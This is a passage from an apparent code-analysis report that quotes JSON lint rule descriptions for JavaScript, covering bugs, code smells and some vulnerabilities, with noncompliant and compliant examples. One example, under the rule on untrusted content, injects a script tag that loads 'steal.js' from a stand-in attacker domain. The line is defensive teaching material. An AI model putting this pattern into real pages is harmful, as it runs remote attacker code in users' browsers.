<\/li>\n  <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n  <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. 
Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nwith (foo) {  \/\/ Noncompliant\n  y = 4;  \/\/ updates foo.x\n  x = 3;  \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/js.html by fixme

      BUG found
      Open

<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doFirstThing();\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50) {\n  doFirstThing();\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n  case 3:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif ((a &gt;= 0 &amp;&amp; a &lt; 10) || (a &gt;= 20 &amp;&amp; a &lt; 50)) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doFirstThing();\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50) {\n  doFirstThing();\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following 
<code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; j++) {  \/\/ Noncompliant\n  \/\/ ...\n  i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; i++, j++) {\n  \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i &lt; 10; i++) {\n  \/\/ ...\n  j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. 
Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined;  \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\";  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. 
But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(dividend, divisor);  \/\/ Noncompliant; operation succeeds, but result is unexpected\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(divisor, dividend);\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong 
direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i--) { \/\/ Noncompliant;\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i++) {\n  \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var i;  \/\/ Noncompliant; should be declared in if-block\n  if (a &gt; b) {\n    i = a;\n    console.log(i);\n    var x = a - b;  \/\/ Noncompliant; should be declared outside if-block\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var x = a - b;\n\n  if (a &gt; b) {\n    var i = a;\n    console.log(i);\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially 
impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n  <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n  URIError <\/li>\n  <li> Numbers and dates - Number, Math, Date <\/li>\n  <li> Text processing - String, RegExp <\/li>\n  <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,\n  Float64Array <\/li>\n  <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n  <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n  <li> Control abstraction objects - Promise <\/li>\n  <li> Reflection - Reflect, Proxy <\/li>\n  <li> Internationalization - Intl <\/li>\n  <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\");  \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. 
Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this.name = name;\n    return 42;  \/\/ Noncompliant\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n  \/\/ ...\n  set name(name) {\n    this.name = name;\n  }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attributes with spaces in the names could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            'first name': 'Bob',      \/\/ Noncompliant\n            'birth date': new Date()  \/\/ Noncompliant\n        },\n    });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n        defaults: {\n            firstName: 'Bob',\n            birthDate: new Date()\n        },\n    });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. 
Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n  doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n  doSomething();\n} else {\n  doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. 
If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n  doSomething();\n}\n\nif (b &amp;&amp; a) { \/\/ Noncompliant; \"a\" is always \"true\"\n  doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n  doSomething();\n}\n\nif (b) {\n  doSomething();\n}\n\nif (c) {\n  doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. 
For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n  var s = document.createElement(\"script\");\n  s.setAttribute(\"type\", \"text\/javascript\");\n  s.setAttribute(\"src\", url);\n  document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\")  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n  <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. 
Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) {  \/\/ Noncompliant; always false\n  console.log(\"a is not a number\");  \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n  console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n  console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n  console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. 
Any checks which look for\nvalues &gt;0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt; 0) { \/\/ Noncompliant\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; 0 { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") &gt;= 0) {\n  \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") &gt; -1) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\");    \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\");    \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. 
That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n  <p>Beginning your selector with an ID is always best.<\/p>\n  <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n  selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num;  \/\/ Noncompliant; target = -3. 
Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num;  \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n  <li> <code>.andSelf()<\/code> <\/li>\n  <li> <code>.context<\/code> <\/li>\n  <li> <code>.die()<\/code> <\/li>\n  <li> <code>.error()<\/code> <\/li>\n  <li> <code>jQuery.boxModel<\/code> <\/li>\n  <li> <code>jQuery.browser<\/code> <\/li>\n  <li> <code>jQuery.sub()<\/code> <\/li>\n  <li> <code>jQuery.support<\/code> <\/li>\n  <li> <code>.live()<\/code> <\/li>\n  <li> <code>.load()<\/code> <\/li>\n  <li> <code>.selector<\/code> <\/li>\n  <li> <code>.size()<\/code> <\/li>\n  <li> <code>.toggle()<\/code> <\/li>\n  <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. 
(It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024);  \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n  Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. 
According to the specification:<\/p>\n<blockquote>\n  Authors should not use the wildcard keyword (\n  <code>*<\/code>) in the\n  <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n  is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. 
<\/p>\n<p>The proper method for removing an element at a certain index would be:<\/p>\n<ul>\n  <li> <code>Array.prototype.splice<\/code> - add\/remove elements from the the array <\/li>\n  <li> <code>Array.prototype.pop<\/code> - add\/remove elements from the end of the array <\/li>\n  <li> <code>Array.prototype.shift<\/code> - add\/remove elements from the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2];  \/\/ Noncompliant. myArray =&gt; ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nremoved = myArray.splice(2, 1);  \/\/ myArray =&gt; ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. 
But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo();   \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo();  \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:&lt;element_type&gt;<\/code> and <code>[type=\"&lt;element_type&gt;\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"&lt;element_type&gt;\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n  <li> <code>:checkbox<\/code> <\/li>\n  <li> <code>:file<\/code> <\/li>\n  <li> <code>:image<\/code> <\/li>\n  <li> <code>:password<\/code> <\/li>\n  <li> <code>:radio<\/code> <\/li>\n  <li> <code>:reset<\/code> <\/li>\n  <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it 